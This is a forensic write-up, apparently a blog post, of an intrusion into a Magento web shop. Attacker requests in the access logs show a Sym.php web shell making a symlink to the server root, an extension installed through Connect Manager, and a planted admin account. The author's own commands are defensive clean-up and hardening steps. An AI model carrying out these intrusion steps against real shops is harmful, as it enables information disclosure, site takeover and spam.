120.188.94.254 - - [04/Dec/2016:23:27:59 +0100] "GET /Sym.php? HTTP/1.1" 200 1019 "http://shop.example.com/Sym.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:28:00 +0100] "GET /Sym.php?sws=sym HTTP/1.1" 200 820 "http://shop.example.com/Sym.php?" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:28:30 +0100] "GET /Sym.php?sws=sym HTTP/1.1" 200 820 "http://shop.example.com/Sym.php?sws=sym" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:28:31 +0100] "GET /Sym.php?sws=sec HTTP/1.1" 200 820 "http://shop.example.com/Sym.php?sws=sym" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:28:33 +0100] "GET /Sym.php?sws=file HTTP/1.1" 200 994 "http://shop.example.com/Sym.php?sws=sec" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:28:37 +0100] "POST /Sym.php?sws=file HTTP/1.1" 200 1023 "http://shop.example.com/Sym.php?sws=file" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
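To pull the attacker's full request history out of the access log, a simple grep on the source IP is enough. A sketch with a two-line sample log (the real log is of course much larger):

```shell
# Two sample entries in combined-log style: one from the attacker, one from elsewhere
cat > access.log <<'EOF'
120.188.94.254 - - [04/Dec/2016:23:27:50 +0100] "GET /Sym.php HTTP/1.1" 200 1019
10.0.0.1 - - [04/Dec/2016:23:28:01 +0100] "GET / HTTP/1.1" 200 5215
EOF

# All requests from the suspect IP; awk picks out method and path
grep '^120\.188\.94\.254 ' access.log | awk '{print $6, $7}'
```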

It took me a while to figure out the real function of this script (besides yet another upload function): it creates a symlink to an arbitrary target. I found the following subfolder and its content:

webserver:/srv/websites/shop.example.com/magento/sym # ll
total 4
-rw-r--r-- 1 wwwrun www 175 Dec  5 10:03 .htaccess
lrwxrwxrwx 1 wwwrun www  32 Dec  4 23:28 file.name_sym ( Ex. :: 1.txt ) -> /home/user/public_html/file.name
lrwxrwxrwx 1 wwwrun www   1 Dec  4 23:27 root -> /

Uh oh... A symlink called "root" was created, pointing to /. Did it work? Unfortunately yes; it seems the Apache option "FollowSymLinks" is enabled:

Web Symlink to root directory 
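The obvious countermeasure is to stop Apache from following arbitrary symlinks. A sketch, assuming Apache 2.x; the directives are written to a local file here for illustration, while in production they belong in the vhost configuration:

```shell
# SymLinksIfOwnerMatch only follows links whose target has the same owner,
# which defeats the wwwrun-owned "root -> /" link (/ belongs to root).
cat > shop-hardening.conf <<'EOF'
<Directory /srv/websites/shop.example.com/magento>
    Options -FollowSymLinks +SymLinksIfOwnerMatch
</Directory>
EOF
cat shop-hardening.conf
```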

And yes, this was accessed by the hacker, too:

120.188.94.254 - - [04/Dec/2016:23:41:59 +0100] "GET /sym/ HTTP/1.1" 200 408 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:42:03 +0100] "GET /sym/root/ HTTP/1.1" 200 780 "http://shop.example.com/sym/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

Information disclosure at its finest! :-(

Uploading files through a web shell already in place is easy, especially when the file permissions are set as mindlessly as this (Magento, is this really necessary?).
But how did all these PHP files get on the server in the first place? This is the interesting part. According to its timestamp, the older file (configurations.php) was uploaded on Dec 4 at 23:05. The log file doesn't give a helpful trace at 23:05:

120.188.94.254 - - [04/Dec/2016:23:05:03 +0100] "GET / HTTP/1.1" 200 5215 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:05:27 +0100] "POST / HTTP/1.1" 200 23614 "http://shop.example.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:05:30 +0100] "GET / HTTP/1.1" 200 5013 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:05:41 +0100] "POST / HTTP/1.1" 200 3046 "http://shop.example.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:05:52 +0100] "POST / HTTP/1.1" 200 2597 "http://shop.example.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:05:55 +0100] "POST / HTTP/1.1" 404 716 "http://shop.example.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:05:59 +0100] "GET / HTTP/1.1" 403 686 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

... but just a few seconds before that, some very interesting requests happened:

120.188.94.254 - - [04/Dec/2016:23:03:49 +0100] "POST /index.php/filesystem/adminhtml_filesystem/tree/isAjax/1/form_key/JzG8egEj5wWSin3q/key/b853d2a14508a9fa48d60ff5c48119c1/ HTTP/1.1" 200 222 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:03:52 +0100] "GET /index.php/filesystem/adminhtml_filesystem/load/fn/L3Nydi93ZWJzaXRlcy9zaG9wLnRhZ2JsYXR0LmNoL21hZ2VudG8vc2hlbGwvaW5kZXhlci5waHA=/key/9fa08aac281c5d2fbdb3c6d660489940/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 2697 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:03:57 +0100] "GET /index.php/filesystem/adminhtml_filesystem/load/fn/L3Nydi93ZWJzaXRlcy9zaG9wLnRhZ2JsYXR0LmNoL21hZ2VudG8vaW5kZXgucGhw/key/9fa08aac281c5d2fbdb3c6d660489940/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 1553 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:08 +0100] "GET /index.php/filesystem/adminhtml_filesystem/close/file/996204877/key/372934d1769190b1cbb62eb3d7803622/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 16 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:09 +0100] "GET /index.php/filesystem/adminhtml_filesystem/close/file/1073874282/key/372934d1769190b1cbb62eb3d7803622/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 16 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:39 +0100] "GET /index.php/filesystem/adminhtml_filesystem/load/fn/L3Nydi93ZWJzaXRlcy9zaG9wLnRhZ2JsYXR0LmNoL21hZ2VudG8vaW5kZXgucGhw/key/9fa08aac281c5d2fbdb3c6d660489940/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 80 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:42 +0100] "GET /index.php/filesystem/adminhtml_filesystem/load/fn/L3Nydi93ZWJzaXRlcy9zaG9wLnRhZ2JsYXR0LmNoL21hZ2VudG8vY3Jvbi5zaA==/key/9fa08aac281c5d2fbdb3c6d660489940/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 1007 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:44 +0100] "GET /index.php/filesystem/adminhtml_filesystem/load/fn/L3Nydi93ZWJzaXRlcy9zaG9wLnRhZ2JsYXR0LmNoL21hZ2VudG8vaW5kZXgucGhw/key/9fa08aac281c5d2fbdb3c6d660489940/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 80 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:51 +0100] "POST /index.php/filesystem/adminhtml_filesystem/save/file/2083702503/key/29bbfb400565c179873af433f751fe64/?isAjax=true HTTP/1.1" 200 16 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:53 +0100] "GET /index.php/filesystem/adminhtml_filesystem/close/file/2083702503/key/372934d1769190b1cbb62eb3d7803622/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 5198 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:55 +0100] "GET /index.php/filesystem/adminhtml_filesystem/close/file/1089227211/key/372934d1769190b1cbb62eb3d7803622/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 5273 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:04:57 +0100] "GET /index.php/filesystem/adminhtml_filesystem/load/fn/L3Nydi93ZWJzaXRlcy9zaG9wLnRhZ2JsYXR0LmNoL21hZ2VudG8vaW5kZXgucGhw/key/9fa08aac281c5d2fbdb3c6d660489940/?isAjax=true&&form_key=JzG8egEj5wWSin3q HTTP/1.1" 200 5361 "http://shop.example.com/index.php/filesystem/adminhtml_filesystem/index/key/a6af76c351b7130cd2be64c31656c082/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
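The fn parameter in those /load/ requests is simply a base64-encoded absolute path, so it is easy to see which files the attacker opened in the editor:

```shell
# Decode the fn blob from one of the requests above
FN='L3Nydi93ZWJzaXRlcy9zaG9wLnRhZ2JsYXR0LmNoL21hZ2VudG8vY3Jvbi5zaA=='
DECODED=$(echo "$FN" | base64 -d)
echo "$DECODED"    # an absolute path below /srv/websites/
```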

It seems that some filesystem plugin/extension was installed. My research pointed me to https://www.reddit.com/r/hacking/comments/34025m/magento_exploit_downlaoding_magpleasurefilesystem/, where the extension "Magpleasure Filesystem" also turned up after a hack. And as in the Reddit post, the extension seems to have been installed through the "/downloader" subfolder (that's the fixed URL of the Magento Connect Manager):

125.161.32.96 - - [04/Dec/2016:22:52:22 +0100] "POST //downloader/ HTTP/1.1" 200 6990 "http://shop.example.com//downloader/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
125.161.32.96 - - [04/Dec/2016:22:52:33 +0100] "GET /downloader/index.php?A=empty HTTP/1.1" 200 1167 "http://shop.example.com//downloader/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
125.161.32.96 - - [04/Dec/2016:22:53:26 +0100] "POST /downloader/index.php?A=connectInstallPackageUpload&maintenance=1&archive_type=0&backup_name= HTTP/1.1" 200 1192 "http://shop.example.com//downloader/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
125.161.32.96 - - [04/Dec/2016:22:53:29 +0100] "POST /downloader/index.php?A=cleanCache HTTP/1.1" 200 95 "http://shop.example.com//downloader/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

And right after that, a successful login to the admin interface seems to have happened (note the successfully loaded admin CSS):

91.211.2.12 - - [04/Dec/2016:22:53:41 +0100] "GET /index.php/admin/ HTTP/1.1" 200 1255 "http://shop.example.com/index.php/admin/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
91.211.2.12 - - [04/Dec/2016:22:53:41 +0100] "POST /index.php/admin/ HTTP/1.1" 200 1314 "http://shop.example.com/index.php/admin/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
125.161.32.96 - - [04/Dec/2016:22:55:12 +0100] "GET /skin/adminhtml/default/default/reset.css HTTP/1.1" 200 2925 "http://shop.example.com/index.php/admin/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

In general the Magento Connect Manager, which is always available under MAGENTOURL/downloader, should be disabled. This page has some additional information.
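Disabling Connect Manager can be as simple as moving the downloader directory out of the web-accessible tree (or denying access to it in the web server). A sketch using a throwaway stand-in docroot; in production the path would be the Magento installation directory:

```shell
# Stand-in docroot for demonstration (real path: /srv/websites/.../magento)
DOCROOT=$(mktemp -d)
mkdir "$DOCROOT/downloader"

# Move the Connect Manager out of the web root
mv "$DOCROOT/downloader" "$DOCROOT/downloader.disabled"
ls "$DOCROOT"
```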

Through the upload in Connect Manager (unauthenticated? a vulnerability in Connect Manager? I'm not sure), the hacker was able to gain access to the admin dashboard and, a few minutes later, created his own admin user (note: I am only showing the newly created account; all other accounts are removed from the output for privacy reasons):

mysql> select user_id, email, username, password, created, modified from admin_user;
+---------+--------------------------------+----------------+------------------------------------------+---------------------+---------------------+
| user_id | email                          | username       | password                                 | created             | modified            |
+---------+--------------------------------+----------------+------------------------------------------+---------------------+---------------------+
|      20 | admin@demo.com                 | admins         | 864eb4c20f8ab86d595c28434fff16a7:xX      | 2016-12-04 22:56:15 | NULL                |
+---------+--------------------------------+----------------+------------------------------------------+---------------------+---------------------+
5 rows in set (0.00 sec)

The hacker successfully created his own admin account (username "admins") at 22:56:15, which corresponds to this POST:

125.161.32.96 - - [04/Dec/2016:22:56:15 +0100] "POST /index.php/admin/ HTTP/1.1" 302 0 "http://shop.example.com/index.php/admin/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

So what was the entry point for the hack? From what I can see in the logs, there are two possibilities:

1) There is a vulnerability in Magento Connect Manager which allows uploading and installing extensions without authentication.
2) The hacker used an already existing admin user, either through a brute-force login or (worse) through a previous hack. Potentially the "shoplift" vulnerability (see here for more information) could have been used in the past to create a new admin account before the shop was patched.

Either way, I contacted the shop administrator and cleaned up the files modified since Dec 4th. Here's a complete list:

webserver:/srv/websites/shop.example.com/magento # find . -user wwwrun -mtime -2
./app/design/adminhtml/default/default/template/filesystem
./app/design/adminhtml/default/default/template/filesystem/ide
./app/design/adminhtml/default/default/template/filesystem/ide/editor.phtml
./app/design/adminhtml/default/default/template/filesystem/ide/tree.phtml
./app/design/adminhtml/default/default/template/filesystem/ide.phtml
./app/design/adminhtml/default/default/template/filesystem/wrapper.phtml
./app/design/adminhtml/default/default/layout/filesystem.xml
./app/etc/modules/Magpleasure_Filesystem.xml
./app/code/community/Magpleasure
./app/code/community/Magpleasure/Filesystem
./app/code/community/Magpleasure/Filesystem/Helper
./app/code/community/Magpleasure/Filesystem/Helper/Data.php
./app/code/community/Magpleasure/Filesystem/sql
./app/code/community/Magpleasure/Filesystem/sql/filesystem_setup
./app/code/community/Magpleasure/Filesystem/sql/filesystem_setup/mysql4-install-1.0.php
./app/code/community/Magpleasure/Filesystem/Model
./app/code/community/Magpleasure/Filesystem/Model/Tree.php
./app/code/community/Magpleasure/Filesystem/controllers
./app/code/community/Magpleasure/Filesystem/controllers/Adminhtml
./app/code/community/Magpleasure/Filesystem/controllers/Adminhtml/FilesystemController.php
./app/code/community/Magpleasure/Filesystem/etc
./app/code/community/Magpleasure/Filesystem/etc/adminhtml.xml
./app/code/community/Magpleasure/Filesystem/etc/system.xml
./app/code/community/Magpleasure/Filesystem/etc/config.xml
./app/code/community/Magpleasure/Filesystem/Block
./app/code/community/Magpleasure/Filesystem/Block/Adminhtml
./app/code/community/Magpleasure/Filesystem/Block/Adminhtml/Ide
./app/code/community/Magpleasure/Filesystem/Block/Adminhtml/Ide/Editor.php
./app/code/community/Magpleasure/Filesystem/Block/Adminhtml/Ide/Tree.php
./app/code/community/Magpleasure/Filesystem/Block/Adminhtml/Ide.php
./js/filesystem
./js/filesystem/script.js
./js/filesystem/base64.js
./js/filesystem/jquery-1.4.2.min.js
./js/filesystem/script.coffee
./js/filesystem/jqueryfiletree.js
./js/editarea
./js/editarea/license_apache.txt
./js/editarea/edit_area_full.js
./js/editarea/highlight.js
./js/editarea/reg_syntax
./js/editarea/reg_syntax/css.js
./js/editarea/reg_syntax/python.js
./js/editarea/reg_syntax/pas.js
./js/editarea/reg_syntax/robotstxt.js
./js/editarea/reg_syntax/coldfusion.js
./js/editarea/reg_syntax/html.js
./js/editarea/reg_syntax/java.js
./js/editarea/reg_syntax/perl.js
./js/editarea/reg_syntax/cpp.js
./js/editarea/reg_syntax/phtml.js
./js/editarea/reg_syntax/php.js
./js/editarea/reg_syntax/brainfuck.js
./js/editarea/reg_syntax/ruby.js
./js/editarea/reg_syntax/basic.js
./js/editarea/reg_syntax/c.js
./js/editarea/reg_syntax/vb.js
./js/editarea/reg_syntax/js.js
./js/editarea/reg_syntax/sql.js
./js/editarea/reg_syntax/tsql.js
./js/editarea/reg_syntax/xml.js
./js/editarea/license_lgpl.txt
./js/editarea/search_replace.js
./js/editarea/langs
./js/editarea/langs/ja.js
./js/editarea/langs/bg.js
./js/editarea/langs/hr.js
./js/editarea/langs/zh.js
./js/editarea/langs/cs.js
./js/editarea/langs/de.js
./js/editarea/langs/es.js
./js/editarea/langs/fi.js
./js/editarea/langs/pl.js
./js/editarea/langs/pt.js
./js/editarea/langs/en.js
./js/editarea/langs/nl.js
./js/editarea/langs/fr.js
./js/editarea/langs/eo.js
./js/editarea/langs/dk.js
./js/editarea/langs/ru.js
./js/editarea/langs/mk.js
./js/editarea/langs/sk.js
./js/editarea/langs/it.js
./js/editarea/images
./js/editarea/images/search.gif
./js/editarea/images/processing.gif
./js/editarea/images/close.gif
./js/editarea/images/newdocument.gif
./js/editarea/images/redo.gif
./js/editarea/images/load.gif
./js/editarea/images/help.gif
./js/editarea/images/spacer.gif
./js/editarea/images/fullscreen.gif
./js/editarea/images/opacity.png
./js/editarea/images/word_wrap.gif
./js/editarea/images/reset_highlight.gif
./js/editarea/images/smooth_selection.gif
./js/editarea/images/move.gif
./js/editarea/images/autocompletion.gif
./js/editarea/images/undo.gif
./js/editarea/images/save.gif
./js/editarea/images/highlight.gif
./js/editarea/images/statusbar_resize.gif
./js/editarea/images/go_to_line.gif
./js/editarea/edit_area_compressor.php
./js/editarea/edit_area.css
./js/editarea/plugins
./js/editarea/plugins/charmap
./js/editarea/plugins/charmap/charmap.js
./js/editarea/plugins/charmap/langs
./js/editarea/plugins/charmap/langs/ja.js
./js/editarea/plugins/charmap/langs/bg.js
./js/editarea/plugins/charmap/langs/hr.js
./js/editarea/plugins/charmap/langs/zh.js
./js/editarea/plugins/charmap/langs/cs.js
./js/editarea/plugins/charmap/langs/de.js
./js/editarea/plugins/charmap/langs/es.js
./js/editarea/plugins/charmap/langs/pl.js
./js/editarea/plugins/charmap/langs/pt.js
./js/editarea/plugins/charmap/langs/en.js
./js/editarea/plugins/charmap/langs/nl.js
./js/editarea/plugins/charmap/langs/fr.js
./js/editarea/plugins/charmap/langs/eo.js
./js/editarea/plugins/charmap/langs/dk.js
./js/editarea/plugins/charmap/langs/ru.js
./js/editarea/plugins/charmap/langs/mk.js
./js/editarea/plugins/charmap/langs/sk.js
./js/editarea/plugins/charmap/langs/it.js
./js/editarea/plugins/charmap/images
./js/editarea/plugins/charmap/images/charmap.gif
./js/editarea/plugins/charmap/popup.html
./js/editarea/plugins/charmap/css
./js/editarea/plugins/charmap/css/charmap.css
./js/editarea/plugins/charmap/jscripts
./js/editarea/plugins/charmap/jscripts/map.js
./js/editarea/plugins/test
./js/editarea/plugins/test/test2.js
./js/editarea/plugins/test/langs
./js/editarea/plugins/test/langs/ja.js
./js/editarea/plugins/test/langs/bg.js
./js/editarea/plugins/test/langs/hr.js
./js/editarea/plugins/test/langs/zh.js
./js/editarea/plugins/test/langs/cs.js
./js/editarea/plugins/test/langs/de.js
./js/editarea/plugins/test/langs/es.js
./js/editarea/plugins/test/langs/pl.js
./js/editarea/plugins/test/langs/pt.js
./js/editarea/plugins/test/langs/en.js
./js/editarea/plugins/test/langs/nl.js
./js/editarea/plugins/test/langs/fr.js
./js/editarea/plugins/test/langs/eo.js
./js/editarea/plugins/test/langs/dk.js
./js/editarea/plugins/test/langs/ru.js
./js/editarea/plugins/test/langs/mk.js
./js/editarea/plugins/test/langs/sk.js
./js/editarea/plugins/test/langs/it.js
./js/editarea/plugins/test/images
./js/editarea/plugins/test/images/Thumbs.db
./js/editarea/plugins/test/images/test.gif
./js/editarea/plugins/test/test.js
./js/editarea/plugins/test/css
./js/editarea/plugins/test/css/test.css
./js/editarea/edit_area.js
./js/editarea/edit_area_functions.js
./js/editarea/regexp.js
./js/editarea/license_bsd.txt
./js/editarea/edit_area_loader.js
./js/editarea/resize_area.js
./js/editarea/keyboard.js
./js/editarea/template.html
./js/editarea/edit_area_full.gz
./js/editarea/autocompletion.js
./js/editarea/elements_functions.js
./js/editarea/manage_area.js
./js/editarea/reg_syntax.js
./bootstrap.php
./Sym.php
./index.php
./tmp
./tmp/mobile
./tmp/.htaccess
./configurations.php
./skin/adminhtml/default/default/filesystem
./skin/adminhtml/default/default/filesystem/images
./skin/adminhtml/default/default/filesystem/images/script.png
./skin/adminhtml/default/default/filesystem/images/ppt.png
./skin/adminhtml/default/default/filesystem/images/music.png
./skin/adminhtml/default/default/filesystem/images/html.png
./skin/adminhtml/default/default/filesystem/images/pdf.png
./skin/adminhtml/default/default/filesystem/images/application.png
./skin/adminhtml/default/default/filesystem/images/phtml.png
./skin/adminhtml/default/default/filesystem/images/flash.png
./skin/adminhtml/default/default/filesystem/images/linux.png
./skin/adminhtml/default/default/filesystem/images/zip.png
./skin/adminhtml/default/default/filesystem/images/db.png
./skin/adminhtml/default/default/filesystem/images/doc.png
./skin/adminhtml/default/default/filesystem/images/psd.png
./skin/adminhtml/default/default/filesystem/images/film.png
./skin/adminhtml/default/default/filesystem/images/spinner.gif
./skin/adminhtml/default/default/filesystem/images/file.png
./skin/adminhtml/default/default/filesystem/images/ruby.png
./skin/adminhtml/default/default/filesystem/images/picture.png
./skin/adminhtml/default/default/filesystem/images/directory.png
./skin/adminhtml/default/default/filesystem/images/folder_open.png
./skin/adminhtml/default/default/filesystem/images/java.png
./skin/adminhtml/default/default/filesystem/images/code.png
./skin/adminhtml/default/default/filesystem/images/txt.png
./skin/adminhtml/default/default/filesystem/images/xls.png
./skin/adminhtml/default/default/filesystem/images/css.png
./skin/adminhtml/default/default/filesystem/images/php.png
./skin/adminhtml/default/default/filesystem/css
./skin/adminhtml/default/default/filesystem/css/styles.css
./skin/adminhtml/default/default/filesystem/css/jqueryfiletree.css
./ljamailer.php
./downloader/Maged/index.php
./sym
./sym/file.name_sym ( Ex. :: 1.txt )
./sym/root
./sym/.htaccess
./[Cache files]
./var/resource_config.json
./var/package/File_System-1.0.0.xml
./var/package/tmp
./var/package/tmp/package.xml
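One caveat about the find sweep above: it keys on mtime, which an attacker can reset with touch. The inode change time (ctime), however, cannot be set from userspace, so checking it as well catches backdated files. A small demonstration:

```shell
# A freshly created file, then backdated by ten days (GNU touch)
SCRATCH=$(mktemp -d)
touch "$SCRATCH/fresh.php"
touch -d '10 days ago' "$SCRATCH/fresh.php"

# The mtime check misses the backdated file...
find "$SCRATCH" -type f -mtime -2

# ...but the ctime check still finds it (touch itself updated the inode)
find "$SCRATCH" -type f -ctime -2
```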

At the end of the analysis I realized the hacker was able to:

- Disclose information (using a symlink to the web server's root directory)
- Upload files
- Send spam (through an uploaded PHP script)
- Log in successfully as admin
- Create a new admin account
- Install an extension (Magpleasure Filesystem) through Connect Manager (authenticated or not, that's still the big question to me)

A successful day for the hacker - not so much for me, as I had to clean up, restore backups and shout at the responsible webmaster.

 

